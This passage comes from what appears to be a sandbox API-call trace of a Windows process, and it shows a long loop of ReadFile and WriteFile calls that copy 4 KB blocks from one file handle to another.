lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.135] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.135] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.139] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.139] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.145] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.145] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.194] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.194] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.195] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.195] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.195] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.195] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.195] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.196] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.196] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.196] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.196] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.196] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.197] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.197] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.197] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.197] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.197] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.198] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.198] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.198] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.198] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.198] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.199] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.199] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.200] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.200] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.201] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.202] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.203] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.203] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.203] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.203] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.204] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.204] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 